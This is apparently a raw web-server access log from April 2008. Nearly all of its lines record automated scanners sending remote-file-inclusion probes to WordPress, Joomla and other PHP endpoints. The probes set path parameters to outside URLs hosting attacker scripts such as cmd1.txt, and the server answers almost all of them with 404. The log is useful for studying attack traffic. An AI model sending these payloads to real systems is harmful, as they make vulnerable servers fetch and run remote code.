67.19.107.122 - - [01/Apr/2008:06:37:46 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [01/Apr/2008:06:37:46 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:37:49 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:37:49 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [01/Apr/2008:06:37:49 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:37:50 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [01/Apr/2008:06:38:01 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:06:38:03 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:06:38:03 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:06:38:03 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:06:38:17 -0700] "GET /logs/access_080313.log//index.php?sourcedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:06:38:17 -0700] "GET /logs//index.php?sourcedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.99.75 - - [01/Apr/2008:06:38:32 -0700] "GET /logs/access_080131.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.99.75 - - [01/Apr/2008:06:38:33 -0700] "GET /logs/access_080131.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.99.75 - - [01/Apr/2008:06:38:34 -0700] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.99.75 - - [01/Apr/2008:06:38:34 -0700] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.99.75 - - [01/Apr/2008:06:38:37 -0700] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.99.75 - - [01/Apr/2008:06:38:38 -0700] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:06:38:56 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:38:56 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:38:57 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:38:57 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:06:38:58 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:06:39:15 -0700] "GET /logs/access_080127.log/index1.php?menu=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:06:39:15 -0700] "GET /index1.php?menu=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:06:39:16 -0700] "GET /logs/index1.php?menu=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:39:45 -0700] "GET /logs/access.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:39:45 -0700] "GET /logs/access.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:06:39:57 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:06:40:02 -0700] "GET /logs/access_080207.log/index1.php?menu=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:40:09 -0700] "GET /logs/access_080119.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.118.81.182 - - [01/Apr/2008:06:40:10 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/bangke77/cmdrfi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:40:11 -0700] "GET /logs/access_080119.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:06:40:13 -0700] "GET /logs/access_080117.log/index.php?pageurl=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:06:40:13 -0700] "GET /index.php?pageurl=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:06:40:14 -0700] "GET /logs/index.php?pageurl=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:40:14 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:40:14 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:06:40:14 -0700] "GET /logs/access_080312.log/index.php?pageurl=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:40:15 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.118.81.182 - - [01/Apr/2008:06:40:16 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/bangke77/cmdrfi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.118.81.182 - - [01/Apr/2008:06:40:16 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/bangke77/cmdrfi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:40:32 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:40:32 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:40:41 -0700] "GET /logs/access_080207.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:40:41 -0700] "GET /logs/access_080207.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:40:49 -0700] "GET /logs/access_080201.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:40:49 -0700] "GET /logs/access_080201.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:06:41:13 -0700] "GET /logs/access_080103.log/index1.php?site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [01/Apr/2008:06:41:14 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:42:02 -0700] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:42:02 -0700] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:42:23 -0700] "GET //ashnews.php?pathtoashnews=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:42:24 -0700] "GET /logs//ashnews.php?pathtoashnews=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:06:42:49 -0700] "GET /logs/access_080223.log//index.php?sourcedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:42:53 -0700] "GET /logs/access_080125.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:43:37 -0700] "GET /logs/access_080125.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:06:43:57 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:06:43:57 -0700] "GET //include/functions_common.php?gl_root_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:43:58 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:44:06 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.archfuck.ru/administrator/components/com_remository/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:44:07 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.archfuck.ru/administrator/components/com_remository/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.154.47 - - [01/Apr/2008:06:44:08 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.kingwild.com/c? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:44:11 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.archfuck.ru/administrator/components/com_remository/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.54.61 - - [01/Apr/2008:06:45:03 -0700] "GET /tmp/?N=A HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:45:05 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.154.47 - - [01/Apr/2008:06:45:14 -0700] "GET /logs/access_080118.log/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.kingwild.com/c? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.154.47 - - [01/Apr/2008:06:45:16 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.kingwild.com/c? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.154.47 - - [01/Apr/2008:06:46:10 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.kingwild.com/c? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.118.81.182 - - [01/Apr/2008:06:46:21 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/bangke77/cmdrfi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:06:46:38 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:06:46:38 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:06:46:38 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:06:46:50 -0700] "GET /logs/access_080131.log/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:06:46:51 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.3.45 - - [01/Apr/2008:06:47:12 -0700] "GET /logs/access_080118.log//modules/xfsection/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.3.45 - - [01/Apr/2008:06:47:12 -0700] "GET //modules/xfsection/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.3.45 - - [01/Apr/2008:06:47:13 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.3.45 - - [01/Apr/2008:06:47:23 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.163.141.54 - - [01/Apr/2008:06:47:36 -0700] "GET //include/functions_common.php?gl_root_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.154.47 - - [01/Apr/2008:06:47:37 -0700] "GET /logs/access_080118.log/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.kingwild.com/c? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.154.47 - - [01/Apr/2008:06:47:42 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.kingwild.com/c? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:47:57 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:48:01 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.57.154.47 - - [01/Apr/2008:06:49:04 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.kingwild.com/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:49:06 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.archfuck.ru/administrator/components/com_remository/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.110 - - [01/Apr/2008:06:50:09 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.190.1.171 - - [01/Apr/2008:06:50:10 -0700] "GET /index.php?go1=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.234 - - [01/Apr/2008:06:50:10 -0700] "GET /bikes/GPS/WeSTOC2008/?S=A HTTP/1.0" 200 842 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:50:12 -0700] "GET //includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:50:13 -0700] "GET /logs//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:50:15 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:50:15 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:50:16 -0700] "GET /classes/core/language.php?rootdir=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:50:16 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:50:16 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:50:16 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:50:19 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:50:19 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:50:20 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:50:20 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:50:21 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:50:21 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:50:22 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:50:23 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:50:23 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:50:25 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:50:25 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:50:25 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.24.154 - - [01/Apr/2008:06:50:28 -0700] "GET /logs/access.log//atom.php5?page=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.24.154 - - [01/Apr/2008:06:50:28 -0700] "GET //atom.php5?page=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.24.154 - - [01/Apr/2008:06:50:28 -0700] "GET /logs//atom.php5?page=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:50:29 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:50:30 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:50:30 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
